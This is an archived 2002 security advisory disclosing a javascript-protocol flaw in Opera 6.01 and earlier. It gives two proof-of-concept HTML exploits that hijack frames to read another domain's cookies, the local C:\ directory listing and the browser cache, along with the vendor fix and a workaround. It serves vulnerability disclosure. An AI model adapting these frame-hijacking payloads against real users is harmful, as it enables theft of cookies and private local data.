- Sandblad advisory #6 -
---..---..---..---..---..---..---..---..---..---..---..---..----
Title: Opera javascript protocoll vulnerability
Date: [2002-05-15]
Software: At least Opera 6.01, 6.0, 5.12 (win)
Rating: High because Opera is assumed to be secure
Impact: Read cookies/local filestructure/cache
Vendor: Opera has confirmed the vulnerability and released
today a new version 6.02 fixing the issue.
http://www.opera.com/ _ _
Workaround: Disable javascript. o' \,=./ `o
Author: Andreas Sandblad, sandbladat_private (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
DESCRIPTION:
============
Opera allows the location of a frame to be overwritten by an url
containing the javascript protocoll. The javascript code will be operating
in the same domain as the url that was overwritten. Thus we can read
cookies from other domains, local file structure and private information
from the cache (history of links visited).
EXPLOIT I:
==========
The following exploit has been tested to work on Opera 6.01, 6.0 (win). It
will not work on 5.x because it requires the iframe feature.
------------------- CUT HERE -----------------------------------
<iframe name=cookie src="http://www.google.com/" height=0
width=0></iframe>
<iframe name=files src="file://c:/" height=0 width=0></iframe>
<iframe name=cache src="opera:cache" height=0 width=0></iframe><br>
<a href="javascript:readCookie()">Read google cookie</a><br>
<a href="javascript:readFiles()">Read c:/ structure (win)</a><br>
<a href="javascript:readCache()">Read links in cache</a><br>
<script>
function readCookie(){
cookie.location="javascript:alert(document.cookie)";
}
function readFiles(){
t = 'javascript:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
files.location = t;
}
function readCache(){
t = 'javascript:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
cache.location = t;
}
</script>
------------------- CUT HERE -----------------------------------
EXPLOIT II:
===========
For versions of Opera not supporting the iframe tag the exploit must be
done using the frame tag instead. The following exploit has been tested on
Opera 6.01, 6.0, 5.12 (win).
------------------- CUT HERE -----------------------------------
<HTML>
<FRAMESET ROWS="100%,0,0,0">
<FRAME SRC="payload.html">
<FRAME NAME="cache" src="opera:cache" noresize>
<FRAME NAME="files" src="file:///c:/" noresize>
<FRAME NAME="cookie" src="http://www.google.com/" noresize>
</FRAMESET>
</HTML>
------------------- CUT HERE -----------------------------------
payload.html:
------------------- CUT HERE -----------------------------------
<a href="javascript:alert(document.cookie)" target="cookie">Google
cookie</a><br>
<a href="javascript:alert(document.links.item(0))" target="cache">First
item in cache</a><br>
<a href="javascript:alert(document.links.item(1))" target="files">First
file/directory in c:\ (win)</a>
------------------- CUT HERE -----------------------------------
Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.
Old advisories:
===============
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561
Feedback:
=========
Please send suggestions and comments to: _ _
sandbladat_private o' \,=./ `o
(o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at the University of Umea, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--
This archive was generated by hypermail 2b30 : Wed May 15 2002 - 10:09:27 PDT